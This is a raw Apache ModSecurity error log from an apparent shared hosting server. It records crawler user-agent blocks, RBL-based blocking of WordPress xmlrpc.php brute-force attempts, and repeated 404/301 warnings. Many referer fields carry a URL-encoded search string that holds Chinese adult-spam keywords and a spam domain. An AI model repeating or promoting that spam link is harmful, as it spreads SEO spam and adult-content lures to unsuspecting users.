[Tue May 26 14:06:06.786349 2026] [security2:error] [pid 578581:tid 578835] [client 114.119.130.13:62147] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "jobs.ucdc.co.in"] [uri "/robots.txt"] [unique_id "ahVbdpm_8al1sb-umPuKDgAAAHw"]
[Tue May 26 14:06:07.319094 2026] [security2:error] [pid 578581:tid 578724] [client 122.114.252.76:49200] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbd5m_8al1sb-umPuKGgAAAA0"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:07.478705 2026] [security2:error] [pid 578581:tid 578740] [client 122.114.252.76:49203] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbd5m_8al1sb-umPuKHgAAAB0"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:07.615130 2026] [security2:error] [pid 578581:tid 578714] [client 202.141.30.10:65336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbd5m_8al1sb-umPuKIwAAAAM"]
[Tue May 26 14:06:07.615846 2026] [security2:error] [pid 578581:tid 578714] [client 202.141.30.10:65336] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVbd5m_8al1sb-umPuKIwAAAAM"]
[Tue May 26 14:06:07.677393 2026] [security2:error] [pid 578581:tid 578752] [client 122.114.252.76:49204] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbd5m_8al1sb-umPuKJQAAACk"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:07.751143 2026] [security2:error] [pid 578581:tid 578814] [client 122.114.252.76:49205] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbd5m_8al1sb-umPuKJwAAAGc"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:08.102512 2026] [security2:error] [pid 578581:tid 578813] [client 122.114.252.76:49207] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeJm_8al1sb-umPuKLgAAAGY"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:08.138907 2026] [security2:error] [pid 578581:tid 578809] [client 122.114.252.76:49206] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeJm_8al1sb-umPuKLwAAAGI"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:08.463028 2026] [security2:error] [pid 578581:tid 578747] [client 122.114.252.76:49214] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeJm_8al1sb-umPuKPQAAACQ"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:08.654399 2026] [security2:error] [pid 578581:tid 578835] [client 122.114.252.76:49222] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeJm_8al1sb-umPuKQgAAAHw"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:08.676377 2026] [security2:error] [pid 578581:tid 578774] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbeJm_8al1sb-umPuKPAAAAD8"]
[Tue May 26 14:06:08.883533 2026] [security2:error] [pid 578581:tid 578776] [client 122.114.252.76:49223] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeJm_8al1sb-umPuKQwAAAEE"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:08.898031 2026] [security2:error] [pid 578581:tid 578825] [client 122.114.252.76:49224] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeJm_8al1sb-umPuKSgAAAHI"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:08.942432 2026] [security2:error] [pid 578581:tid 578817] [client 122.114.252.76:49225] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeJm_8al1sb-umPuKSwAAAGo"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:09.478932 2026] [security2:error] [pid 578581:tid 578814] [client 122.114.252.76:49227] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeZm_8al1sb-umPuKYQAAAGc"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:09.512857 2026] [security2:error] [pid 578581:tid 578832] [client 122.114.252.76:49226] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeZm_8al1sb-umPuKYgAAAHk"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:09.705965 2026] [security2:error] [pid 578581:tid 578730] [client 122.114.252.76:49228] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeZm_8al1sb-umPuKagAAABM"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:09.742185 2026] [security2:error] [pid 578581:tid 578768] [client 122.114.252.76:49229] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeZm_8al1sb-umPuKawAAADk"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:09.903068 2026] [security2:error] [pid 578581:tid 578755] [client 122.114.252.76:49230] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeZm_8al1sb-umPuKeAAAACw"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:09.913277 2026] [security2:error] [pid 578581:tid 578790] [client 122.114.252.76:49231] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbeZm_8al1sb-umPuKeQAAAE8"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:10.270694 2026] [security2:error] [pid 578581:tid 578777] [client 122.114.252.76:49232] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbepm_8al1sb-umPuKgwAAAEI"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:10.460019 2026] [security2:error] [pid 578581:tid 578780] [client 122.114.252.76:49233] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbepm_8al1sb-umPuKiQAAAEU"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:10.538825 2026] [security2:error] [pid 578581:tid 578784] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbepm_8al1sb-umPuKfAAAAEk"]
[Tue May 26 14:06:10.829548 2026] [security2:error] [pid 578581:tid 578712] [client 122.114.252.76:49239] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbepm_8al1sb-umPuKkQAAAAE"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:11.142993 2026] [autoindex:error] [pid 578581:tid 578719] [client 143.110.222.27:0] AH01276: Cannot serve directory /home2/glorolle/public_html/carppaintings.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:06:11.784919 2026] [autoindex:error] [pid 578581:tid 578820] [client 143.110.222.27:0] AH01276: Cannot serve directory /home2/glorolle/public_html/carppaintings.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:06:12.324048 2026] [security2:error] [pid 578581:tid 578783] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbe5m_8al1sb-umPuKxgAAAEg"]
[Tue May 26 14:06:13.314869 2026] [security2:error] [pid 578581:tid 578777] [client 122.114.252.76:49269] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbfZm_8al1sb-umPuK9QAAAEI"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:13.405057 2026] [security2:error] [pid 578581:tid 578744] [client 122.114.252.76:49270] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbfZm_8al1sb-umPuK9gAAACE"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:13.466680 2026] [security2:error] [pid 578581:tid 578811] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbfZm_8al1sb-umPuK9AAAAGQ"]
[Tue May 26 14:06:13.776636 2026] [security2:error] [pid 578581:tid 578729] [client 122.114.252.76:49271] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbfZm_8al1sb-umPuLBQAAABI"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:14.062107 2026] [security2:error] [pid 578581:tid 578750] [client 122.114.252.76:49272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbfpm_8al1sb-umPuLDwAAACc"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:14.180769 2026] [security2:error] [pid 578581:tid 578721] [client 122.114.252.76:49276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbfpm_8al1sb-umPuLEQAAAAo"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:14.291139 2026] [security2:error] [pid 578581:tid 578831] [client 122.114.252.76:49278] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbfpm_8al1sb-umPuLGgAAAHg"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:14.543222 2026] [security2:error] [pid 578581:tid 578778] [client 122.114.252.76:49277] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbfpm_8al1sb-umPuLIgAAAEM"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:14.677661 2026] [security2:error] [pid 578581:tid 578741] [client 122.114.252.76:49279] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbfpm_8al1sb-umPuLKQAAAB4"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:14.848285 2026] [security2:error] [pid 578581:tid 578724] [client 122.114.252.76:49282] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbfpm_8al1sb-umPuLKgAAAA0"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:14.935407 2026] [security2:error] [pid 578581:tid 578744] [client 173.225.100.133:55496] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVbfpm_8al1sb-umPuLLgAAACE"], referer: https://www.cagmedya.com/
[Tue May 26 14:06:14.954800 2026] [security2:error] [pid 578581:tid 578828] [client 122.114.252.76:49283] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbfpm_8al1sb-umPuLMwAAAHU"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:15.193387 2026] [security2:error] [pid 578581:tid 578784] [client 122.114.252.76:49284] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbf5m_8al1sb-umPuLOgAAAEk"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:15.326124 2026] [security2:error] [pid 578581:tid 578822] [client 122.114.252.76:49285] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbf5m_8al1sb-umPuLPAAAAG8"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:15.947926 2026] [security2:error] [pid 578581:tid 578790] [client 122.114.252.76:49290] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbf5m_8al1sb-umPuLUQAAAE8"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:15.950732 2026] [security2:error] [pid 578581:tid 578817] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVbf5m_8al1sb-umPuLTAAAAGo"]
[Tue May 26 14:06:15.951108 2026] [security2:error] [pid 578581:tid 578762] [client 122.114.252.76:49286] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbf5m_8al1sb-umPuLUgAAADM"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:16.330642 2026] [security2:error] [pid 578581:tid 578764] [client 122.114.252.76:49291] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbgJm_8al1sb-umPuLWgAAADU"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
[Tue May 26 14:06:16.742366 2026] [security2:error] [pid 578581:tid 578741] [client 122.114.252.76:49298] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVbgJm_8al1sb-umPuLZQAAAB4"], referer: https://panda-eco.com/?s=%E7%B2%BE%E6%B2%B9%E6%8C%89%E6%91%A9%E6%BD%AE%E5%96%B7A%E7%89%87%20https%3A%2F%2Frvrpro1.langyou.cfd%20%E5%A5%B3%E5%90%8C%E6%80%A7%E6%81%8B
